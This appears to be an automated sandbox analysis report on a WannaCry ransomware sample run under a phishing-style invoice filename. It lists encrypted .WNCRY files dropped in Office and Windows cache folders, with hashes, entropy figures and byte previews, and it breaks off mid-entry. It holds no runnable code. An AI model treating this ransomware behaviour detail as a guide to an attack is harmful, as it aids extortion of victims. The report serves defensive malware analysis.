                                                          SHA-512:5FFC2707657175D366326364C76E0808F5D4C1ED3F47B2E5442AB073D79B148BA2FB570E8398D0B32A5C609A5672ED73D455F1D15A071FC7AE638AD7D9F6BE0A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....I......e.k}'N.%.....".K;....W....4..7.@.......G|c._.N.d..U.!...J..g......9.H8!..6..s)....\6?}.....O.."!'N.N.G..4../. .v...7..0.L.0..7..[....(.]....+h..v.V......4.........J`.6.SI/j..=....RLu.{.._.....R.\....q...I.R.N....5ZO...B>.....~........`.......K......Ug...<H...E...F......m..%f}....i9.nt.|l...L.fLC.........'UQ.8..v....R1.v.."dA.{..M.X...Q].^.J..............r.(...O....cO.VM...TI.u.[l\.Qa...+...%^>2..|.$A...gc../...-..9...X..!B.....<dh.M\&..PXj..}.<z.{.87.....'..........<.......{...u."._.......`v.b..3Mmk.....s...^.../.P......ywLH../.....p..<~a......~.........8.5.h...Xv......./S...>...j:.....?...vb.....%..<..U{.O=.U ~D.A.......Q{J}.......[Z<Y.`(.....7x......3..).....`...~..b.....g(...0<O?. ..../....J.qC..|T..R.....2f.?5.d@... .d........../...m.t..."K.;.h.6..2...!b.e.C.b....3m.[...aJ.s.cha...O..C=...W.;..5..%.;..rD3Fd&V9.<.iL......G ..*...8......[.;..A.W1.s.....H...(......ds.F..YL.z...R.r..Z.1Z.C.....G....Z8.2.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.993406946076543
                                                          Encrypted:true
                                                          SSDEEP:384:8Oh++k11Fp2JW/HcXcl2DRwnEbWKu8nl4zFyBnP4AQbDsghd1zf0VFo:8Oh++0H/HUCqEWWKu8n6BOWl3OFo
                                                          MD5:00FB43386353A61A18F150E14BE4D4DF
                                                          SHA1:0D8F7F8C453081586909DD0F608518DB5B9930BB
                                                          SHA-256:B2801214AD45FDDF0552A6DFE1B5EB6006C3A09CD061B0E7EB510CE7F7976ACD
                                                          SHA-512:5FFC2707657175D366326364C76E0808F5D4C1ED3F47B2E5442AB073D79B148BA2FB570E8398D0B32A5C609A5672ED73D455F1D15A071FC7AE638AD7D9F6BE0A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....I......e.k}'N.%.....".K;....W....4..7.@.......G|c._.N.d..U.!...J..g......9.H8!..6..s)....\6?}.....O.."!'N.N.G..4../. .v...7..0.L.0..7..[....(.]....+h..v.V......4.........J`.6.SI/j..=....RLu.{.._.....R.\....q...I.R.N....5ZO...B>.....~........`.......K......Ug...<H...E...F......m..%f}....i9.nt.|l...L.fLC.........'UQ.8..v....R1.v.."dA.{..M.X...Q].^.J..............r.(...O....cO.VM...TI.u.[l\.Qa...+...%^>2..|.$A...gc../...-..9...X..!B.....<dh.M\&..PXj..}.<z.{.87.....'..........<.......{...u."._.......`v.b..3Mmk.....s...^.../.P......ywLH../.....p..<~a......~.........8.5.h...Xv......./S...>...j:.....?...vb.....%..<..U{.O=.U ~D.A.......Q{J}.......[Z<Y.`(.....7x......3..).....`...~..b.....g(...0<O?. ..../....J.qC..|T..R.....2f.?5.d@... .d........../...m.t..."K.;.h.6..2...!b.e.C.b....3m.[...aJ.s.cha...O..C=...W.;..5..%.;..rD3Fd&V9.<.iL......G ..*...8......[.;..A.W1.s.....H...(......ds.F..YL.z...R.r..Z.1Z.C.....G....Z8.2.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.9926872744243616
                                                          Encrypted:true
                                                          SSDEEP:384:Dl4A+rNBr04MIFKZB/NpTK115BwC2PawFDG1X6t0/weejHmmY7nPP5bX/QDjYqT:DlfjDx5c12SwFM4HmrrJbPa
                                                          MD5:1A30F64FD0234F00A815C7CAB0FBB70D
                                                          SHA1:FABAF34060EB5A7F9E30FE4D8D3DEDADF0411EAC
                                                          SHA-256:4DFDC453E8711D9834AF9F7514E6396BB4A7C3A61B937C92D50CB309848AD5DE
                                                          SHA-512:E211BFF6FA1A70CC24CDAE4E8D5A052B43B64318800716D50BE500D73C2A5F07B6DA917EBF2C2991C92B7279184E61E4A6E72E1152A75DA8D33B9D6761738C78
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......f-..W.?.s...jf..........,p.i.l...T....`rV~,.Gx...?@...0.k.gg:L.A..G.B.l.....v......\.I. J..xA...f.L.+....P.d.........f.).....zr...s.4.z..}....2.yA.J...X..8..SZ_"*.Q.GXapMx.G..ON.yjfs:.A.....i....e@..?..2aQ'.i....f.0..$...Q..;W?.~.:a9.)&..gj.*7&6..p.....`......\..0...gG........(.P~.v....&:..(Z1........3.f'+I.owl.4.../.).....].......w...W..Q..w.....l.....?.Y....f.LRq/..2.Y...U...|d.....?+|.4.....0.W.IUg......].zI..4`Cu...#b..e.:.b...?O..Y..9z..i.....<.....C.8.DW?~H._..........P.....>bof"..o.E$.\..".(/....$.....YS.f....-M....J..fZ2...f...B.m..7.9.sb..IH!?W.G...L.....J~-JH,...z57...XzE1..W..&.....N..."q...Po..L.........68.Ti......B..^..s...wF.Yb....)....f.<|O.6..l..U..xi.Uf.7x..$'.#.n.!l....x..HQ;.Z...oft..~..(...;.....3...%{eN..w.T.{.A.l,...v.Q&.bN..-......".43........m.?...H.{q.x..GX..J..L..0....sp.0.........%.8..L;.JX...-.\.g.$.4.m.N.kI.|8G..{s.5.x.2...~.... ..|.M.$.......s...,....s.0Mz...jI...88..$...C.IG.d.OP.........jsvO.J.c.U.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.9926872744243616
                                                          Encrypted:true
                                                          SSDEEP:384:Dl4A+rNBr04MIFKZB/NpTK115BwC2PawFDG1X6t0/weejHmmY7nPP5bX/QDjYqT:DlfjDx5c12SwFM4HmrrJbPa
                                                          MD5:1A30F64FD0234F00A815C7CAB0FBB70D
                                                          SHA1:FABAF34060EB5A7F9E30FE4D8D3DEDADF0411EAC
                                                          SHA-256:4DFDC453E8711D9834AF9F7514E6396BB4A7C3A61B937C92D50CB309848AD5DE
                                                          SHA-512:E211BFF6FA1A70CC24CDAE4E8D5A052B43B64318800716D50BE500D73C2A5F07B6DA917EBF2C2991C92B7279184E61E4A6E72E1152A75DA8D33B9D6761738C78
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......f-..W.?.s...jf..........,p.i.l...T....`rV~,.Gx...?@...0.k.gg:L.A..G.B.l.....v......\.I. J..xA...f.L.+....P.d.........f.).....zr...s.4.z..}....2.yA.J...X..8..SZ_"*.Q.GXapMx.G..ON.yjfs:.A.....i....e@..?..2aQ'.i....f.0..$...Q..;W?.~.:a9.)&..gj.*7&6..p.....`......\..0...gG........(.P~.v....&:..(Z1........3.f'+I.owl.4.../.).....].......w...W..Q..w.....l.....?.Y....f.LRq/..2.Y...U...|d.....?+|.4.....0.W.IUg......].zI..4`Cu...#b..e.:.b...?O..Y..9z..i.....<.....C.8.DW?~H._..........P.....>bof"..o.E$.\..".(/....$.....YS.f....-M....J..fZ2...f...B.m..7.9.sb..IH!?W.G...L.....J~-JH,...z57...XzE1..W..&.....N..."q...Po..L.........68.Ti......B..^..s...wF.Yb....)....f.<|O.6..l..U..xi.Uf.7x..$'.#.n.!l....x..HQ;.Z...oft..~..(...;.....3...%{eN..w.T.{.A.l,...v.Q&.bN..-......".43........m.?...H.{q.x..GX..J..L..0....sp.0.........%.8..L;.JX...-.\.g.$.4.m.N.kI.|8G..{s.5.x.2...~.... ..|.M.$.......s...,....s.0Mz...jI...88..$...C.IG.d.OP.........jsvO.J.c.U.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4376
                                                          Entropy (8bit):7.959021503732141
                                                          Encrypted:false
                                                          SSDEEP:96:o5ANjEbFMfFyXJqV/iwoj67fHgj3J7E1ItbaZ8qiaBrCANwhFnGpwcv:OG3OqVqwoIcEOtm8qRcANwhdGpww
                                                          MD5:4429383119373101B691405E4B0A7ABD
                                                          SHA1:3B7EF97E0DD89FBB61EDC4CBC480B5BFBBEA2576
                                                          SHA-256:D000E6EE2B4BDFCD022A21CFDE35734AC53DB5DCBDBD4F27B35B9540979E0EF2
                                                          SHA-512:58145A0E432FF9D03275AB34E8394B229312BC4CD757C96E8760BDCA2D3060C43E55967DE674B02F8C8CF2E7CB2BA8C1F0A31FE5927FC720007D2E9BE5A3271C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......u._1#.....v.!.b}>!l...0...C..<.m.K....g.....*..T;..)...>k.0....~...sW@..g8.....U......-......[q...0Z#[....E)..<2..]&._.r.#.....=.X..5.f.H.y.b.H..B9.5.}2+=....`...:..e..s..[...L.}U{.C..M..,.Co..Do;.....l.J...RH.n*.....r|.i.@S<~-h.....Q6.L..p.a..............$....._8..*@.NE..0@:.x.!.S./.Z..q..Q.1Xz.=i.}.Va...nYS.....P.;..S..:..-u...l.|.4.P........ijs......." C.4.).~k!.s..t0...m..p-L9m#T.v.2/.3.....b...jf......r....[.._. ..KO......zG0;.PEM.._...(..E.Au..-....i%\.l...J*Uw..G.J...+........K......F.}o..<K9A..N.R.+x.OX..4s.nf.S0f.A.^....L.~..}W...4.B&..'B...9o......X..P.......o8..6..<_..S?..M....%....j.Y.k.9.'..x.J7!...ax....S.L...W.2'H....s..:Q.d&..N.%h...B.j3..z....hW.f_...Z'].o....0h..v.......0..-0zwR.w9......o......T~..}...@...L..^..ReBJ....q...3...2..=.......W1j..!.6T.o:....>.....Gg..o p."w..,.To..d.V.|bc.-x..L..Mi....,..g7....s...&..q.7...........E*9".UJ...g.B.B.<DP.|%^?....L.4...C;..k;.k.....Zd4u.<...5...z.Y.U..U.7...U

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4376
                                                          Entropy (8bit):7.959021503732141
                                                          Encrypted:false
                                                          SSDEEP:96:o5ANjEbFMfFyXJqV/iwoj67fHgj3J7E1ItbaZ8qiaBrCANwhFnGpwcv:OG3OqVqwoIcEOtm8qRcANwhdGpww
                                                          MD5:4429383119373101B691405E4B0A7ABD
                                                          SHA1:3B7EF97E0DD89FBB61EDC4CBC480B5BFBBEA2576
                                                          SHA-256:D000E6EE2B4BDFCD022A21CFDE35734AC53DB5DCBDBD4F27B35B9540979E0EF2
                                                          SHA-512:58145A0E432FF9D03275AB34E8394B229312BC4CD757C96E8760BDCA2D3060C43E55967DE674B02F8C8CF2E7CB2BA8C1F0A31FE5927FC720007D2E9BE5A3271C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......u._1#.....v.!.b}>!l...0...C..<.m.K....g.....*..T;..)...>k.0....~...sW@..g8.....U......-......[q...0Z#[....E)..<2..]&._.r.#.....=.X..5.f.H.y.b.H..B9.5.}2+=....`...:..e..s..[...L.}U{.C..M..,.Co..Do;.....l.J...RH.n*.....r|.i.@S<~-h.....Q6.L..p.a..............$....._8..*@.NE..0@:.x.!.S./.Z..q..Q.1Xz.=i.}.Va...nYS.....P.;..S..:..-u...l.|.4.P........ijs......." C.4.).~k!.s..t0...m..p-L9m#T.v.2/.3.....b...jf......r....[.._. ..KO......zG0;.PEM.._...(..E.Au..-....i%\.l...J*Uw..G.J...+........K......F.}o..<K9A..N.R.+x.OX..4s.nf.S0f.A.^....L.~..}W...4.B&..'B...9o......X..P.......o8..6..<_..S?..M....%....j.Y.k.9.'..x.J7!...ax....S.L...W.2'H....s..:Q.d&..N.%h...B.j3..z....hW.f_...Z'].o....0h..v.......0..-0zwR.w9......o......T~..}...@...L..^..ReBJ....q...3...2..=.......W1j..!.6T.o:....>.....Gg..o p."w..,.To..d.V.|bc.-x..L..Mi....,..g7....s...&..q.7...........E*9".UJ...g.B.B.<DP.|%^?....L.4...C;..k;.k.....Zd4u.<...5...z.Y.U..U.7...U

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.990963149747461
                                                          Encrypted:true
                                                          SSDEEP:384:v1wCkr8u3lV55GrWXEedf0lDaXSRlCYN4wMkLGq5PE5EeIZEl:v1w1V58mEmEjRlCCXPne5ETZe
                                                          MD5:9A302B58866140C3142FED0942209BAD
                                                          SHA1:E28DA2EC7DE6D6364346862089257B2E85D01D0A
                                                          SHA-256:11DB843CA4C67C1171AC646EB5B86C8B4B015550FAB671F784F44DCFD2E76957
                                                          SHA-512:92C650ABD132D37D4C2760D99F61582047847C90F6363A38A5CF6A6C6596F97231A241E3FB9D41430F2D94681C9C777E8EA75ECF8446CAFA95E1EB88FDFF2B79
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....@..p..s.n..........H3(=........~........JG....u..W!..0...(n/..[.....O.H.......i...x..:.g^..........c..o.].D...g.....U.+....4UR.Z...T.,..T...g[.h.8........R.......%.......g+....>...XYFp...k@....Z........T......n...Be.8.@..W_...8%...^..S.e.......@.......4. ..hm.OW...%......D.V...E.?.......M....6lR4..6..6.QsM.-v8.x..V~..I,y..?i...t.i;.......>.....I{.....3.q{.2(s<#..?}..)4X.$.;...;y..MQ.NI.!i1R.L..toX,..v.J.. X;X(.j...W.'.Z4...)M.9.6.x."%.s..8du..6d..IQ..$Q?.....O.E....I......nS...RMP......V...l..{d..^....t\........W..|...O..VX<..,...s]O.._Qqp.P.$.....?a....X...".-MY....T..y....K....|e..........|...-I. lLq#....(.BT.~.k..jC..p.......Q.=....h....~p.R_...-..m%Q.P.[.|y....*\.2.rE2..|2......]s...0......wL.r........H.I...M..2.b..K'Jw_F-...@.4VE-R..pC{.uU_"...Z.X....pp.x<.J../D.W........O.*e.=.........w>.'...\.C........b..>.(_..A.O~JV.K.......+..1.. |4uI.'>A_...^.._..3H.T9..J.mL'W....r.i..O.!.gDV.Q....{s.....m.`.......

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.990963149747461
                                                          Encrypted:true
                                                          SSDEEP:384:v1wCkr8u3lV55GrWXEedf0lDaXSRlCYN4wMkLGq5PE5EeIZEl:v1w1V58mEmEjRlCCXPne5ETZe
                                                          MD5:9A302B58866140C3142FED0942209BAD
                                                          SHA1:E28DA2EC7DE6D6364346862089257B2E85D01D0A
                                                          SHA-256:11DB843CA4C67C1171AC646EB5B86C8B4B015550FAB671F784F44DCFD2E76957
                                                          SHA-512:92C650ABD132D37D4C2760D99F61582047847C90F6363A38A5CF6A6C6596F97231A241E3FB9D41430F2D94681C9C777E8EA75ECF8446CAFA95E1EB88FDFF2B79
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....@..p..s.n..........H3(=........~........JG....u..W!..0...(n/..[.....O.H.......i...x..:.g^..........c..o.].D...g.....U.+....4UR.Z...T.,..T...g[.h.8........R.......%.......g+....>...XYFp...k@....Z........T......n...Be.8.@..W_...8%...^..S.e.......@.......4. ..hm.OW...%......D.V...E.?.......M....6lR4..6..6.QsM.-v8.x..V~..I,y..?i...t.i;.......>.....I{.....3.q{.2(s<#..?}..)4X.$.;...;y..MQ.NI.!i1R.L..toX,..v.J.. X;X(.j...W.'.Z4...)M.9.6.x."%.s..8du..6d..IQ..$Q?.....O.E....I......nS...RMP......V...l..{d..^....t\........W..|...O..VX<..,...s]O.._Qqp.P.$.....?a....X...".-MY....T..y....K....|e..........|...-I. lLq#....(.BT.~.k..jC..p.......Q.=....h....~p.R_...-..m%Q.P.[.|y....*\.2.rE2..|2......]s...0......wL.r........H.I...M..2.b..K'Jw_F-...@.4VE-R..pC{.uU_"...Z.X....pp.x<.J../D.W........O.*e.=.........w>.'...\.C........b..>.(_..A.O~JV.K.......+..1.. |4uI.'>A_...^.._..3H.T9..J.mL'W....r.i..O.!.gDV.Q....{s.....m.`.......

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.988524921607321
                                                          Encrypted:false
                                                          SSDEEP:384:g4CEjsOxHmPxKTe3PpdqN5bmZalcAX4yrts0xGfja6IJ7kmm6i+GOmcc:gMZxHmpkefnqjCZaDDSj+mew
                                                          MD5:CC019A5D67197FF3052EDB046FE18DB9
                                                          SHA1:FFD11B5F094E3D82D29E3BECFEC069716DB7FF2E
                                                          SHA-256:A8EFB6F01C12ED4406C9D6D75282D7B4E0C43FF56ECCADE7CAB199436BF33894
                                                          SHA-512:A1A3E9394B3C5C571F6414EB02D2C7907C62AA92CEDDF5D982C8692E764C237CE8A1E94DE99C3477F1E0317F59D64FB389118B41970B6DE7CA7108C8582C78B0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....20..rqI...|..?.%N.<.IMi.(.~.Z..%.J.9...`^.l.....Q.m.n.4..'"..8.1...c..3pfB..9..=.c......S...J'...J8.p...:..SG......9P`...j.i`y.q.R0%."v.|..$6.x..n.....Yu..7c.."q..(...x..q*.z....Hv......%.t.(0....d<...$.Rd.).q$.....z......Ed#A..l..$>..Cq0.D%.....@..........v...2Z.A.,!..0./..Y.b.....R.v)ZO.......Rw^.1 ..S?.2.ia\.:...d...Vp.(T.En ....)'.3..z...+.....Y@.......~.(.K.a.....O|.+"w.iHM....I...o..p....lI_..{g.@?]...8u&...6.i... 0.W..S.X............_......O.@.Q*..a....`..(D...E.B..c.........o....S.G.l.Wo..v..y....D"<.O...X}.2.....H..6C.|4..L^oP.v....6...Zq.,%n..Y~3s.}...yi..1..r<.p....t.. .............[n<[.s........5..QMr..#..A...~.......w.<._.......?T...M..\..6.......*y/.B.d^.........ocK..m.h...A...#...S!...=...m..#......c.s...d.t.~X./4...x.]y+..nQ"P.k..i1K..C..>#k...N.v..?...SO.Op...nm!c(EU...v..m.....e......{.`.T...y.|1.K.3.X.......r6.._g....>.L}..#"..$T8[.4....._..wz5!.J.".,......-.*.p..7...aGz.m.q..~...w..*."

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.988524921607321
                                                          Encrypted:false
                                                          SSDEEP:384:g4CEjsOxHmPxKTe3PpdqN5bmZalcAX4yrts0xGfja6IJ7kmm6i+GOmcc:gMZxHmpkefnqjCZaDDSj+mew
                                                          MD5:CC019A5D67197FF3052EDB046FE18DB9
                                                          SHA1:FFD11B5F094E3D82D29E3BECFEC069716DB7FF2E
                                                          SHA-256:A8EFB6F01C12ED4406C9D6D75282D7B4E0C43FF56ECCADE7CAB199436BF33894
                                                          SHA-512:A1A3E9394B3C5C571F6414EB02D2C7907C62AA92CEDDF5D982C8692E764C237CE8A1E94DE99C3477F1E0317F59D64FB389118B41970B6DE7CA7108C8582C78B0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....20..rqI...|..?.%N.<.IMi.(.~.Z..%.J.9...`^.l.....Q.m.n.4..'"..8.1...c..3pfB..9..=.c......S...J'...J8.p...:..SG......9P`...j.i`y.q.R0%."v.|..$6.x..n.....Yu..7c.."q..(...x..q*.z....Hv......%.t.(0....d<...$.Rd.).q$.....z......Ed#A..l..$>..Cq0.D%.....@..........v...2Z.A.,!..0./..Y.b.....R.v)ZO.......Rw^.1 ..S?.2.ia\.:...d...Vp.(T.En ....)'.3..z...+.....Y@.......~.(.K.a.....O|.+"w.iHM....I...o..p....lI_..{g.@?]...8u&...6.i... 0.W..S.X............_......O.@.Q*..a....`..(D...E.B..c.........o....S.G.l.Wo..v..y....D"<.O...X}.2.....H..6C.|4..L^oP.v....6...Zq.,%n..Y~3s.}...yi..1..r<.p....t.. .............[n<[.s........5..QMr..#..A...~.......w.<._.......?T...M..\..6.......*y/.B.d^.........ocK..m.h...A...#...S!...=...m..#......c.s...d.t.~X./4...x.]y+..nQ"P.k..i1K..C..>#k...N.v..?...SO.Op...nm!c(EU...v..m.....e......{.`.T...y.|1.K.3.X.......r6.._g....>.L}..#"..$T8[.4....._..wz5!.J.".,......-.*.p..7...aGz.m.q..~...w..*."

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):424136
                                                          Entropy (8bit):7.9994861666099
                                                          Encrypted:true
                                                          SSDEEP:6144:4w+D/GyQUpjd9LO4xfy74xhTqFES+H5LZ+rf/5GLBs3A3h/3LVtk0PsAoLOl:4w+DuzUpDVRxhgfK5LZ6n5JQRDDrPsJA
                                                          MD5:012A1054251EA72A606060498DF9EE90
                                                          SHA1:41033F05477E726CA2B2F37D53606A2744B87480
                                                          SHA-256:877590EBBB3ABF7209089C63DF5A07E7A5E93FC6F49296FF7BAE664901DBEBE8
                                                          SHA-512:F45227837860D60207C4B5C8F3E8DC2F5CBF100B71906A1E7A893B1BCF2440BCF1006DD41D4FA615670D5DB5F09F0A8CC6697E9A8D4E923281337BA251000D5E
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....2..9..!...Lw.7.W.......IaV.5i..1{....d.XB...in.@#..........V.q..o...^..U...&..x.99 .H.......De..N.V..by.).Z..#.x~.RC...'<&.......hd.l..#8.7.R..]@.".$5]:.&.V..B.g.]....9'...S@.[..J&...}L."...Pk\{....E....s...0`.R.f]...<.n.L.....vq=..........o.F...lV.......w......l..-.\.....u.WF./.l.K....*..,.+.:..$.X.n.|..X~w]mK..O..;...~.$..Q...t.|:`q~A_.'3.L.Y%..Q^B.4x%Hh$&.#e......n.~.J.m..-V.....,.....6 h+.P7......j=...M .7.q. .J....b.fc'..y...BG{...T,...A..r.....j.t|..{9Q.G..W!..b,.c...yGCx.%7.L.\...CB.&D....V.Aw..=..4.d3.}..<-^<..x.!...=....6..U~a.t=.Y....<M..}..t...........a....D.`MBQi.2...9....m.6.[.S.'.Dq...I<...3i.k.y..X.....C..F....+.g.......y...Z..]...R_M..U...........IV.4....7.......j...4. 7i..q.y.....z.1..k.r>.)..Q.O..jp9....j..8...zj..2....03..D...Q...HB)....."eQ..z....5%U....&Ra...#!..!.2..&...."p.c?......*....:..y+.t..y.B...V.E..^....<....qV;H.....3u..).;jS.X..l.q...i...V..zO|...R.'..U..S.*N.Q.u/........5..H...14..8.qQ..-1d....g7.+..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):424136
                                                          Entropy (8bit):7.9994861666099
                                                          Encrypted:true
                                                          SSDEEP:6144:4w+D/GyQUpjd9LO4xfy74xhTqFES+H5LZ+rf/5GLBs3A3h/3LVtk0PsAoLOl:4w+DuzUpDVRxhgfK5LZ6n5JQRDDrPsJA
                                                          MD5:012A1054251EA72A606060498DF9EE90
                                                          SHA1:41033F05477E726CA2B2F37D53606A2744B87480
                                                          SHA-256:877590EBBB3ABF7209089C63DF5A07E7A5E93FC6F49296FF7BAE664901DBEBE8
                                                          SHA-512:F45227837860D60207C4B5C8F3E8DC2F5CBF100B71906A1E7A893B1BCF2440BCF1006DD41D4FA615670D5DB5F09F0A8CC6697E9A8D4E923281337BA251000D5E
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....2..9..!...Lw.7.W.......IaV.5i..1{....d.XB...in.@#..........V.q..o...^..U...&..x.99 .H.......De..N.V..by.).Z..#.x~.RC...'<&.......hd.l..#8.7.R..]@.".$5]:.&.V..B.g.]....9'...S@.[..J&...}L."...Pk\{....E....s...0`.R.f]...<.n.L.....vq=..........o.F...lV.......w......l..-.\.....u.WF./.l.K....*..,.+.:..$.X.n.|..X~w]mK..O..;...~.$..Q...t.|:`q~A_.'3.L.Y%..Q^B.4x%Hh$&.#e......n.~.J.m..-V.....,.....6 h+.P7......j=...M .7.q. .J....b.fc'..y...BG{...T,...A..r.....j.t|..{9Q.G..W!..b,.c...yGCx.%7.L.\...CB.&D....V.Aw..=..4.d3.}..<-^<..x.!...=....6..U~a.t=.Y....<M..}..t...........a....D.`MBQi.2...9....m.6.[.S.'.Dq...I<...3i.k.y..X.....C..F....+.g.......y...Z..]...R_M..U...........IV.4....7.......j...4. 7i..q.y.....z.1..k.r>.)..Q.O..jp9....j..8...zj..2....03..D...Q...HB)....."eQ..z....5%U....&Ra...#!..!.2..&...."p.c?......*....:..y+.t..y.B...V.E..^....<....qV;H.....3u..).;jS.X..l.q...i...V..zO|...R.'..U..S.*N.Q.u/........5..H...14..8.qQ..-1d....g7.+..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):102680
                                                          Entropy (8bit):7.997970711466538
                                                          Encrypted:true
                                                          SSDEEP:1536:cr6geIiHdej0wGTGDifndl4+NepEg/PEglRMnHgYajHL7HDJYRsLBGs:+7eZ60wVDwe7bE8ATajHL7HNl9
                                                          MD5:3BDA2C9AF257082FA9E0EA4B1D07A805
                                                          SHA1:813A86AD5082668027EFC7DB601C0DDAD9337401
                                                          SHA-256:5F5C9BA885FA89B55AA091AD87680F9E2872B9EDAA837E52E049C8D3D20129C1
                                                          SHA-512:B457B27F06367A80EB128A294F1D542F0911E0F29539E792BC6F0B68F9B0CA20DF4B664B16EA0D6D39A524F6E761A45011A65195F8241CC2EC90F48E7E8D5A59
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g~fT.......*.).Q...,F)......a....l.J..on...7}]GL...R..l1HPr.......zO....j......?.=.2.9.wM.....S...e.......m.?......[l...C.'.3. ...3..vZ...8x.....(.Cc...[.?#e...f{.......*.........$on\.@E.F.@Yb.&.nUU..>...]...e..........,.s1....C.=8e....?.qM.\j.............FN...=4_....Ka.>.^.....%......v..&U.....$..d...p*......l.........t.1`..=.....l....y1..Y7....E.j9...}m.:^.d..0.,..J.l...5..Ft.....9V..X...?..>.3^b.y..^*.!...:.Ye..R.4\.n._....k...P.1.z.5.Ir.H..g%.PLW.....J........5c[0....D..S....Q..G.8.?....e....|.:...}.H.>w..7....U.z)..7..DO..8..9\Am.A...g..w.G30O..Nh.*.....#....mc...I...{...<..0s1.]=e.....&.../..4..)U{10M2......(....;._^=...K............#..r....[...[#..8Q*y....ql...r...X........v..uvS.....C.NUw*..%$n.`.~.........x.A3iB.sz........f2.8..{+..m..rW.q8.J........'.\=.T.W:G.#.r$..}s..O!J....^4...k........$+&.w~ ..=.B......Q..,.......{......+..nv...l.....Zl.....$.n&UV-1&.1... .$K.....$.Cv....x2....;.j!d.75X.^..(.S........OUOM..w.w..P.6

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):102680
                                                          Entropy (8bit):7.997970711466538
                                                          Encrypted:true
                                                          SSDEEP:1536:cr6geIiHdej0wGTGDifndl4+NepEg/PEglRMnHgYajHL7HDJYRsLBGs:+7eZ60wVDwe7bE8ATajHL7HNl9
                                                          MD5:3BDA2C9AF257082FA9E0EA4B1D07A805
                                                          SHA1:813A86AD5082668027EFC7DB601C0DDAD9337401
                                                          SHA-256:5F5C9BA885FA89B55AA091AD87680F9E2872B9EDAA837E52E049C8D3D20129C1
